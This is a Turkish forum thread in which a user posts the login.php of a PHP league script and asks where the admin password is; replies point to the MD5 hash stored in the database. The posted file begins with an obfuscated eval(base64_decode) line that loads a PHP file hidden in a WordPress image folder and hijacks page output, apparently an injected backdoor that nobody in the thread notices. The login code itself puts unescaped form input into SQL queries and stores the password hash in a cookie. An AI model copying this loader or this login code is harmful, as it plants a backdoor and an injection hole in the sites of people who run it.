0
Kayıt Ol

Şifre sorunu?

12

968

  • 09-10-2010, 20:03:42
    #1
    cs_eylul
    cs_eylul
    ~6 ay önce r10 dan birine script yazdırdım ve hiiç destek vs. olmadı sitenin admin şifrelerini bile söylemedi.. PHP bilgimçok zayıf login.php kodları aşağıdadır.Sizce şifre alanı neresidir?

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvdzA5MDAvZDQ1L3MwNy9iMDFkY2I0NC93d3cva29ya3Uvd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zL2lubGluZXBvcHVwcy9za2lucy9jbGVhcmxvb2tzMi9pbWcvY29wcGVyLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php
require("../config.php");
ouverture();
if (isset($_POST['pseudo'])){$pseudo=$_POST['pseudo'];}
if (isset($_POST['pass'])){$pass=$_POST['pass'];}
if (isset($_POST['autoidentification'])) {$autoidentification=$_POST['autoidentification'];} else {$autoidentification='';}

    if($pseudo=='' || $pass=='')
    {
       header("Location:index.php?identification=non");
    }
    else
    {
        $query = "SELECT mot_de_passe FROM phpl_membres WHERE pseudo='$pseudo' and admin='1'";
    $result = mysql_query($query);
    $row = mysql_fetch_array($result);
        $password_crypt = md5($pass);

    if($row['mot_de_passe'] != $password_crypt or mysql_num_rows($result)=="0")
    {
        header("Location:index.php?identification=non2");
    }
    else

    {
    $pseudo = addslashes($pseudo);

        $ip = $_SERVER["REMOTE_ADDR"];
    $time = time();
    $query = "SELECT * FROM phpl_membres WHERE pseudo='$pseudo' and admin='1'";
    $result = mysql_query($query) or die ('Erreur SQL !<br />'.$sql.'<br />'.mysql_error());
    $row = mysql_fetch_array($result);
    $mot_de_passe = $row['mot_de_passe'];

    mysql_query("UPDATE phpl_membres SET ip='$ip', last_connect='$time' WHERE pseudo='$pseudo'");
        if ($autoidentification) {$expire=365*24*3600;}
        else {$expire=3600;}
    setcookie("user","$pseudo",time()+$expire,"/","");
    setcookie("mot_de_passe","$mot_de_passe",time()+$expire,"/","");
    session_start();
    session_register('user');
    session_register('mot_de_passe');
    $_SESSION['user'] = $pseudo;
    $_SESSION['mot_de_passe'] = $mot_de_passe;
    header("Location: index.php?page=championnat");
}
}
?>
  • 09-10-2010, 21:19:54
    #2
    BHCoder
    BHCoder
    Üyeliği durduruldu
    $password_crypt = md5($pass);
  • 10-10-2010, 13:36:43
    #3
    cs_eylul
    cs_eylul
    anlayamadım, kullanıcı adı ve pass örnek yazarmısın acaba?
  • 10-10-2010, 15:26:12
    #4
    Deimosx
    Deimosx
    phpleague scripti değilmi bu? özel bir script değil açık kaynak kodlu bir script bildiğim kadarıyla
    şifre alanı $password_crypt = md5($pass);
    kullanıcı adıda $pseudo
    değişkenlerinde tutuluyor
  • 10-10-2010, 20:46:40
    #5
    cs_eylul
    cs_eylul
    Deimosx adlı üyeden alıntı: mesajı görüntüle
    phpleague scripti değilmi bu? özel bir script değil açık kaynak kodlu bir script bildiğim kadarıyla
    şifre alanı $password_crypt = md5($pass);
    kullanıcı adıda $pseudo
    değişkenlerinde tutuluyor
    kullanıcı adı ve şifre neymiş?
  • 10-10-2010, 22:42:57
    #6
    Hkan
    Hkan
    Veritabanı kullanıyor sanırm. Veritabanından bulabilirsiniz. Şifreyi de ancak değiştirerek kullanabilirsniz. MD5 şifreleme sistemi tek taraflı şifreleme yapar.
  • 10-10-2010, 22:58:31
    #7
    Deimosx
    Deimosx
    bu kodlardan şifre okunmaz arkadaşım, veritabanına bakacaksın
  • 11-10-2010, 18:11:39
    #8
    Oktigh
    Oktigh
    Üyeliği durduruldu
    bu scripte para vermedin inş
  • 12-10-2010, 07:54:13
    #9
    norelpy
    norelpy
    Bu script open source bir scriptir. Scripti kendisi yazmadı.
    Şifrenin olduğu yer:
    if (isset($_POST['pass'])){$pass=$_POST['pass'];}